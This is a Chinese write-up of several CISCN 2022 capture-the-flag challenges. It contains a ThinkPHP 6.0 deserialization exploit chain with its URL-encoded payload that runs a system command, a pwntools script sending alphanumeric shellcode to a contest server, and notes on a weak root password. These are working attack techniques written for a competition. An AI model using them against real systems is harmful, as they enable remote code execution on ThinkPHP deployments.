CISCN 2022 部分赛题WP

Misc

签到电台

首先根据题干，向公众号发送关键字得到 hint

打开题目环境，发现密码本，然后根据公众号的提示，7*4个数字也就是前28位

点击纯数字模式取前 28 位

1	1272685121234614783219665440

然后 弼时安全到达了 所对应的7个电码：

1	1732 2514 1344 0356 0451 6671 0055

先 get请求 启动电报机

1	/send?msg=s

然后 get请求 模十之后的 28 位数字

1	/send?msg=2904836534674960728375375495

WEB

ezpop

tp6.0 的反序列化，直接百度搜一个exp就行了（ ThinkPHP6.0反序列化链审计与分析：https://forum.butian.net/share/1168 ），我们只需要找到反序列化点，经过 dirsearch 扫描，发现存在 www.zip 文件，然后在 index.php 控制器里存在反序列化点

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90

<?php namespace think { use think\route\Url; abstract class Model { private $lazySave; private $exists; protected $withEvent; protected $table; private $data; private $force; public function __construct() { $this->lazySave = true; $this->withEvent = false; $this->exists = true; $this->table = new Url(); $this->force = true; $this->data = ["1"]; } } } namespace think\model { use think\Model; class Pivot extends Model { function __construct() { parent::__construct(); } } $b = new Pivot(); echo urlencode(serialize($b)); } namespace think\route { use think\Middleware; use think\Validate; class Url { protected $url; protected $domain; protected $app; protected $route; public function __construct() { $this->url = 'a:'; $this->domain = "<?php system('cat /flag.txt');?>"; $this->app = new Middleware(); $this->route = new Validate(); } } } namespace think { use think\view\driver\Php; class Validate { public function __construct() { $this->type['getDomainBind'] = [new Php(), 'display']; } } class Middleware { public function __construct() { $this->request = "sp4c1ous"; } } } namespace think\view\driver { class Php { public function __construct() { } } }

payload

1 2 3

// ?s=index/test或者/index.php/index/test a=O%3A17%3A%22think%5Cmodel%5CPivot%22%3A6%3A%7Bs%3A21%3A%22%00think%5CModel%00lazySave%22%3Bb%3A1%3Bs%3A19%3A%22%00think%5CModel%00exists%22%3Bb%3A1%3Bs%3A12%3A%22%00%2A%00withEvent%22%3Bb%3A0%3Bs%3A8%3A%22%00%2A%00table%22%3BO%3A15%3A%22think%5Croute%5CUrl%22%3A4%3A%7Bs%3A6%3A%22%00%2A%00url%22%3Bs%3A2%3A%22a%3A%22%3Bs%3A9%3A%22%00%2A%00domain%22%3Bs%3A32%3A%22%3C%3Fphp+system%28%27cat+%2Fflag.txt%27%29%3B%3F%3E%22%3Bs%3A6%3A%22%00%2A%00app%22%3BO%3A16%3A%22think%5CMiddleware%22%3A1%3A%7Bs%3A7%3A%22request%22%3Bs%3A8%3A%22sp4c1ous%22%3B%7Ds%3A8%3A%22%00%2A%00route%22%3BO%3A14%3A%22think%5CValidate%22%3A1%3A%7Bs%3A4%3A%22type%22%3Ba%3A1%3A%7Bs%3A13%3A%22getDomainBind%22%3Ba%3A2%3A%7Bi%3A0%3BO%3A21%3A%22think%5Cview%5Cdriver%5CPhp%22%3A0%3A%7B%7Di%3A1%3Bs%3A7%3A%22display%22%3B%7D%7D%7D%7Ds%3A17%3A%22%00think%5CModel%00data%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A1%3A%221%22%3B%7Ds%3A18%3A%22%00think%5CModel%00force%22%3Bb%3A1%3B%7D

密码

基于挑战码的双向认证 & 基于挑战码的双向认证2

ssh连上直接 find 搜索flag

1	find / -name 'flag*'

1	cat /root/cube-shell/instance/flag_server/flag*

第一个flag是 基于挑战码的双向认证 第二个是 基于挑战码的双向认证2

基于挑战码的双向认证3

非预期，账号密码：root:toor 弱口令

1	cat /root/cube-shell/instance/flag_server/flag*

PWN

login-nomal

定位到 main > sub_FFD（）

很明显是对 sc 的执行。

1 2 3 4 5 6 7 8 9 10 11

from pwn import * context.arch = 'amd64' context.log_level = 'debug' # p = process('./login') p = remote('123.56.87.204', 36979) pl = "msg:ro0tt\nopt:1\n" p.sendlineafter(">>", pl) key = "Rh0666TY1131Xh333311k13XjiV11Hc1ZXYf1TqIHf9kDqW02DqX0D1Hu3M2G0Z2o4H0u0P160Z0g7O0Z0C100y5O3G020B2n060N4q0n2t0B0001010H3S2y0Y0O0n0z01340d2F4y8P115l1n0J0h0a071N000" pl = "msg:" + key + "\nopt:2\n" p.sendlineafter(">>", pl) p.interactive()

本文作者：iami233
本文链接：https://5ime.cn/ciscn-2022.html
版权声明：本文采用 CC BY-NC-SA 3.0 CN 协议进行许可